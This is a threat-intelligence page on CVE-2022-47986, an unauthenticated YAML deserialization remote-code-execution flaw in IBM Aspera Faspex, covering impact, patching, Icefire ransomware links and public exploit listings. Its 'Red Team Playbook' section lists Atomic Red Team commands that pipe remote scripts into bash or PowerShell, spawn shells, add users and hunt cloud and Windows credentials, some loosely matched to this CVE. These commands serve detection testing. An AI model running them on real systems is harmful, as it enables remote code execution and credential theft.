CVE-2022-47986
Overview
This vulnerability is a YAML deserialization flaw in IBM Aspera Faspex versions 4.4.2 Patch Level 1 and earlier. The root cause lies in the processing of an obsolete API call that improperly deserializes YAML input, enabling execution of arbitrary Ruby objects. The affected component is the package relay API endpoint that handles incoming package relay requests.
Vulnerability Description
IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the affected system, potentially leading to full system compromise. This includes executing commands with the privileges of the Faspex service, accessing sensitive data, or disrupting service availability. No user interaction or credentials are required, making exploitation straightforward in exposed environments and posing a critical risk to confidentiality, integrity, and availability of the system.
Solution
IBM recommends upgrading IBM Aspera Faspex to version 4.4.2 Patch Level 2 or later, where the obsolete API call has been removed, eliminating the deserialization flaw. Detailed patch instructions and advisories are available at IBM Support page node 6952319. Administrators should apply the official patches promptly to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
icefire
|
11 | ransomware.live |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier is rooted in a flaw related to YAML deserialization. This type of vulnerability occurs when untrusted data is processed by a deserialization function without proper validation. In this case, the system's handling of obsolete API calls allows an attacker to craft a malicious payload that, when processed, can lead to the execution of arbitrary code on the server. The deserialization flaw arises from the way the application interprets YAML-formatted data, which can be manipulated to execute unintended commands or scripts within the context of the application.
Attack vectors for exploiting this vulnerability are particularly concerning due to the remote nature of the exploit. An attacker can send specially crafted requests to the affected system, leveraging the obsolete API call that remains active in earlier versions of the software. This means that an attacker does not need physical access to the system or any insider knowledge to execute their attack. By exploiting this vulnerability, an attacker could gain control over the server, potentially leading to unauthorized access to sensitive data, disruption of services, or further lateral movement within the network to compromise additional systems.
The real-world impact of this vulnerability is significant, especially for organizations that rely on IBM Aspera Faspex for secure file transfer and collaboration. Given the high CVSS score of 9.8, the potential for severe consequences is evident. Organizations could face data breaches, loss of intellectual property, and damage to their reputation. Additionally, the financial implications of remediation efforts, regulatory fines, and loss of customer trust can be substantial. The ability for an attacker to execute arbitrary code remotely means that the risk is not just theoretical; it poses a tangible threat to business continuity and security.
To detect and mitigate this vulnerability, organizations should prioritize updating their systems to the latest version of IBM Aspera Faspex, specifically Patch Level 2 or later, where the obsolete API call has been removed. Regular software updates and patch management practices are essential in maintaining a secure environment. Furthermore, organizations should implement network security measures such as intrusion detection systems (IDS) and web application firewalls (WAF) to monitor for unusual activity and block malicious requests. Conducting regular security assessments and penetration testing can also help identify and remediate vulnerabilities before they can be exploited.
In conclusion, the deserialization vulnerability in IBM Aspera Faspex presents a critical risk to organizations utilizing this software. The ability for remote attackers to execute arbitrary code underscores the importance of maintaining up-to-date software and implementing robust security measures. By understanding the technical aspects of the vulnerability, recognizing potential attack vectors, and taking proactive steps to mitigate risks, organizations can better protect themselves against the evolving landscape of cybersecurity threats.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2022-47986, accompanied by the first confirmed association with the ransomware group Icefire. This development signals a shift from theoretical and proof-of-concept exploitations toward active weaponization in ransomware campaigns. Our telemetry indicates that adversaries are increasingly leveraging publicly available exploit modules to compromise vulnerable IBM Aspera Faspex instances, heightening the risk of remote code execution attacks. The integration of this vulnerability into ransomware operations elevates its threat profile, underscoring a transition from isolated exploit activity to coordinated, financially motivated intrusions. Consequently, the overall risk level for organizations running affected versions of Faspex has intensified, warranting heightened vigilance despite the absence of a rapid increase in exploit prevalence. This evolution in the threat landscape highlights the criticality of monitoring ransomware group tactics and reinforces the urgency of addressing this vulnerability within security postures.
Update 2 — July 04, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2022-47986, reflecting a continuing but controlled adversary interest in this IBM Aspera Faspex vulnerability. While the overall frequency of detections remains stable, the recent uptick in activity coincides with sustained ransomware group involvement, particularly from the icefire cluster, reinforcing the vulnerability’s role as a vector for financially motivated intrusions. New proof-of-concept exploits have surfaced, expanding the toolkit available to threat actors and potentially lowering the barrier for exploitation. This evolving landscape underscores the persistent risk to organizations running vulnerable Faspex versions, emphasizing the need for ongoing monitoring. Although the threat level remains critical due to the vulnerability’s inherent severity and ransomware associations, the absence of a rapid surge in exploitation suggests that adversaries are maintaining a measured operational tempo rather than escalating aggressively at this time.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ibm | Aspera Faspex | All |
cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:*
|
|
|
Ibm | Aspera Faspex | 4.4.2 |
cpe:2.3:a:ibm:aspera_faspex:4.4.2:-:*:*:*:*:*:*
|
|
|
Ibm | Aspera Faspex | 4.4.2 |
cpe:2.3:a:ibm:aspera_faspex:4.4.2:patch_level_1:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE) | Maurice Lambert | remote | multiple | - | View |
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ohnonoyesyes/CVE-2022-47986
Aspera Faspex Pre Auth RCE
|
ohnonoyesyes | 6 | 3 | 2023-02-03 | View |
|
mauricelambert/CVE-2022-47986
CVE-2022-47986: Python, Ruby, NMAP and Metasploit modules to exploit the vulnerability.
|
mauricelambert | 2 | 1 | 2023-03-09 | View |
Ransomware Groups 1
Threat Feed
9 eventsSighting activity recorded
Ransomware group known to exploit this vulnerability (11 known victims)
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (11 known victims)
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-47986 |
| ibm.com |
GitHub CVE
vendor-advisory
|
https://www.ibm.com/support/pages/node/6952319 |
| exchange.xforce.ibmcloud.com |
GitHub CVE
vdb-entry
|
https://exchange.xforce.ibmcloud.com/vulnerabilities/243512 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/171772/IBM-Aspera-Faspex-4.4.1-YAML-Deserialization.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-47986 |